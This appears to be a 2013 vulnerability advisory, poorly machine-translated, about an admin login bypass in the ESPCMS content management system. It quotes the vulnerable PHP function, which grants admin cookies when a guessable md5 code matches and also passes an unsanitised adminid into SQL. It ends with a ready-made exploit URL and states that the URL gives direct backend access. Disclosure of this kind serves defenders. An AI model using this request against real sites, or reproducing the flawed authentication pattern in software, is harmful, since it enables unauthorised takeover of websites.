ESPCMS background login bypass bug-vulnerability warning-the black bar safety net

2013-04-26T00:00:00
ID MYHACK58:62201338499
Type myhack58
Reporter c0deplay
Modified 2013-04-26T00:00:00

Description

After a lapse of long time,children's shoes successively sent through the CMS vulnerabilities, today generally see, the problem there is that official or has been repaired loopholes.

The problem is in the background files of adminsoft\control\adminuser. php file

Code The problem is in the function onsitecode()

| 1 | function onsitecode() { ---|---

2 | parent::start_template(); ---|---

3 | $db_table = db_prefix . "admin_member"; ---|---

4 | $linkURL = $_SERVER['HTTP_REFERER']; ---|---

5 | $siteid = $this->fun->accept('siteid', 'R'); ---|---

6 | $code = $this->fun->accept('code', 'R'); ---|---

7 | $adminid = $this->fun->accept('adminid', 'R'); ---|---

8 | $siteip = $this->fun->real_server_ip(); ---|---

9 | //echo $adminid; ---|---

1 0 | if (empty($siteid) || empty($code) || empty($siteip) || empty($this->CON['sitecoedb']) || empty($adminid)) { ---|---

1 1 | exit(); ---|---

1 2 | } ---|---

1 3 | $codelist = md5($this->CON['sitecoedb'] . '' . $siteip . '' . adminfile); ---|---

1 4 | ---|---

1 5 | if ($code == $codelist) { ---|---

1 6 | $db_where = "username='$adminid' AND isclass=1 AND isremote=1"; ---|---

1 7 | $rsMember = $this->db->fetch_first('SELECT id,username,password,powergroup,inputclassid,isclass,isremote FROM' . $db_table . 'WHERE' . $db_where); ---|---

1 8 | if (!$ rsMember) { ---|---

1 9 | exit('ESPCMS:Parameter error!'); ---|---

2 0 | } else { ---|---

2 1 | ---|---

2 2 | $ipadd = $this->fun->ip($_SERVER['REMOTE_ADDR']); ---|---

2 3 | $date = time(); ---|---

2 4 | $db_set = "intime=$date,ipadd=$ipadd,hit=hit+1"; ---|---

2 5 | $this->db->query('UPDATE' . $db_table . 'SET' . $db_set . 'WHERE' . $db_where); ---|---

2 6 | ---|---

2 7 | $db_table = db_prefix . 'admin_powergroup'; ---|---

2 8 | $db_where = 'id=' . $rsMember['powergroup']; ---|---

2 9 | $rsPower = $this->db->fetch_first('SELECT powername,powerlist FROM' . $db_table . 'WHERE' . $db_where); ---|---

3 0 | if ($rsPower['powerlist'] != 'all') { ---|---

3 1 | ---|---

3 2 | $rsPower_array = explode('|', $rsPower['powerlist']); ---|---

3 3 | $rsPower_array = is_array($rsPower_array) ? $this->fun->exp_array($rsPower_array) : $rsPower_array; ---|---

3 4 | ---|---

3 5 | $sysArray = $this->get_powermenulist('all'); ---|---

3 6 | $sys_newsArray = array(); ---|---

3 7 | foreach ($sysArray as $key => $value) { ---|---

3 8 | $sys_newsArray[] = $value['loadfun']; ---|---

3 9 | } ---|---

4 0 | $sys_newsArray = $this->fun->exp_array($sys_newsArray); ---|---

4 1 | ---|---

4 2 | $diff_array = array_diff($sys_newsArray, $rsPower_array); ---|---

4 3 | $rsPower['powerlist'] = implode('|', $diff_array); ---|---

4 4 | } ---|---

4 5 | ---|---

4 6 | $this->fun->setcookie("esp_powerlist", $this->fun->eccode($rsPower['powerlist'], 'ENCODE', db_pscode)); ---|---

4 7 | $this->fun->setcookie('ecisp_admininfo', $this->fun->eccode("$rsMember[id]|$rsMember[username]|$rsMember[password]|" . md5($_SERVER['HTTP_USER_AGENT']) . '|' . $rsMember[powergroup] . '|' . $rsMember[inputclassid] . '|' . md5(admin_ClassURL), 'ENCODE', db_pscode)); ---|---

4 8 | $this->writelog($this->lng['adminuser_login_log_action'], $this->lng['log_extra_ok'] . ' user=' . $rsMember['username'], $rsMember['username']); ---|---

4 9 | header('location: index. php? archive=management&action=tab&loadfun=mangercenter&out=tabcenter'); ---|---

5 0 | exit('true'); ---|---

5 1 | } ---|---

5 2 | } ---|---

5 3 | exit(); ---|---

5 4 | } ---|---

As long as$code == $codelist is validated, then we can construct their own, the main is

$codelist = md5($this->CON['sitecoedb'] . ‘’ . $siteip . ‘’ . adminfile);

The test code is as follows

index. php? archive=adminuser&action=sitecode&adminid=admin&siteid=1&code=f01f70868bbd44aba6ffc8602367abea

Direct access to the Sign in the background.

!